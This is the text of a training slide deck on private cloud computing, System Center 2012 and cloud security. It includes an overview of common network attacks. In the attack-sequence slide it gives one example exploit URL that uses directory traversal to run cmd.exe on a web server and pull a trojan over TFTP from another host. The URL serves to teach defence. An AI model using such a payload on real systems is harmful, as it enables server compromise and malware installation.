Securing The Cloud What is the Cloud? How do you lock it down? Kevin King - Senior Technical Instructor ● Infrastructructure/Cloud Consulting | MCT CCSI MCSE-Private Cloud MCSA MCSA-Server 2012 MCSE CCNA Data Center Cisco Quality Instructor 2014 New Horizons CLC| 6700 Jefferson, Building A | Albuquerque, NM 87109 p: 505.830.7100 |f: 505.830.2239 | kking@nhabq.com | www.nhabq.com 1. Introduction to the Private Cloud 2. Securing the Private Cloud Overview • Overview of the Cloud Computing Model • Requirements for the Private Cloud • Operating a Private Cloud Infrastructure with System Center • Securing the Cloud 1) Overview of the Cloud Computing Model • The Advent of Cloud Computing • Public vs. Private Clouds • Cloud Service Models • Methods to Implement the Private Cloud • System Center 2012 and the Private Cloud The Advent of Cloud Computing Client/Server Architecture Advantages of cloud computing include: Virtualized data center Reduced operational costs Server consolidation Improved resiliency and agility Cloud Computing Public vs. Private Clouds Private cloud: Provides more control Is flexible Is customizable Has operational and management costs Public cloud: Provides less control Provides less flexibility Provides less customization Reduced operational and management costs Cloud Service Models The three cloud service models are: Software as a Service (SaaS) Platform as a Service (PaaS) Infrastructure as a Service (IaaS) Includes business processes and applications Includes application execution services Includes server, storage, and network infrastructure High Methods to Implement the Private Cloud Level of Pre-integration Service Provider Reference Architecture Low Custom High Deployment Time Low System Center 2012 and the Private Cloud System Center 2012 has the following components: • • • • • • • App Controller Service Manager Virtual Machine Manager (VMM) Orchestrator Operations Manager Data Protection Manager (DPM) Configuration Manager 2) Requirements for the Private Cloud • Key Business Requirements • Service Identification and Onboarding • Datacenter Administrators and Business Unit IT Administrators Key Business Requirements The key business requirements include: Competitive advantage Scalability Reduced cost Service Identification and Onboarding • Service Identification: • • • • • Does the application need to reside in the same location as the data? What computer resources are required? What are the software or operating system requirements? What network bandwidth will be required by the application between the users and the cloud? Onboarding: • Has the service passed the identity check and is it ready for the cloud? • Have relevant backups taken place? • Has the migration been tested successfully in a pre-production or UAT environment? • Is there a documented method for fallback? Datacenter Administrators and Business Unit IT Administrators The datacenter administrator: Manages the physical infrastructure Manages the private cloud resources Configures access to cloud resources Datacenter Administrator The business unit IT administrator: Manages the business unit cloud Manages resources specific to the business unit cloud that they own Business Unit IT Administrator 3) Operating a Private Cloud Infrastructure with System Center • Provisioning the Private Cloud with Virtual Machine Manager • Managing Public and Private Clouds with App Controller • Service Management with Service Manager • Automating Data Center Processes with Orchestrator Provisioning the Private Cloud with Virtual Machine Manager • A simple private cloud is created in Virtual Machine Manager by using the Create Cloud Wizard: Managing Public and Private Clouds with App Controller Using the App Controller Portal, you can manage private clouds that were created with VMM and public clouds that were created on the Windows Azure platform Service Management with Service Manager Service Manager delivers an integrated platform for automating and adapting IT service management best practices to your organization's requirements By using Service Manager, you can: Reduce mean time to resolution of issues through a self-service user experience Improve private cloud efficiency through centralized management of change processes Provide self-service provisioning of private cloud resources Implement compliance controls for the management of the private cloud infrastructure Automating Data Center Processes with Orchestrator Orchestrator provides a workflow management solution for the data center that allows you to automate the creation, monitoring, and deployment of resources in your environment By using Orchestrator, you can: Automate processes in your private cloud Improve operational efficiency Connect different systems from different vendors without the knowledge of scripting languages 4) Securing the Private Cloud • Old days – security = planting two firewalls • Today – security = very complex problem Types of Attacks Including, but not limited to: • Packet sniffing— An application that uses the promiscuous mode of the network adapter to capture all networks packets. • IP spoofing— An attack in which a hacker assumes an IP address of others to conceal its true identity • Denial-of-service (DoS) attack— Aims to overwhelm a service so as to deny legitimate requests from being serviced. The service may be in the form of bandwidth, memory, or CPU. It is the most well-known of all Internet attacks, and efforts should be invested in understanding its mechanisms. Some of the more famous DoS attacks include the following: • • • • Code Red Blaster Ping of Death Trinity Types of attacks • Password attack— As its name implies, this attack intends to acquire passwords to important assets so as to cause further damage. Password attacks can be achieved through other methods previously mentioned, such as IP spoofing, or they can be achieved via brute force • Man-in-the-middle attack— This type of attack happens when a hacker manages to position himself between the source and the destination of a network transaction. ARP cache poisoning is one common method • Application attack— This type of attack happens when application software holes are exploited to gain access to a computer system. The holes may be bugs or may be TCP port numbers that are exposed • Port redirection attack— This type of attack makes use of a compromised host to gain access to a network that is otherwise protected • Blue Pilling Sequence of attacks • After a phase of probing/scanning, the hacker detects the vulnerability of the web/application server • The hacker exploits the vulnerability to get a shell • For example: • Copy the Trojan on the web/application server: • HTTPS://www.example.com/scripts/..%c0%af../winnt/syst em32/cmd.exe?/c+tftp%20i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe Server Farm Security Strategies Segmenting the Server Farm Building the Firewall Ruleset From Physical Separation to Logical Separation Securing The Cloud System Center 2012 has the following components: • • • • • • • App Controller Service Manager Virtual Machine Manager (VMM) Orchestrator Operations Manager Data Protection Manager (DPM) Configuration Manager S U R F A C E A R E A Public vs. Private Clouds Physical: Physical access to equipment OOB Management Password Policy Host Security Logical: System Center Components Individual VMs Services and Apps Passwords/Encryption/Least Privledge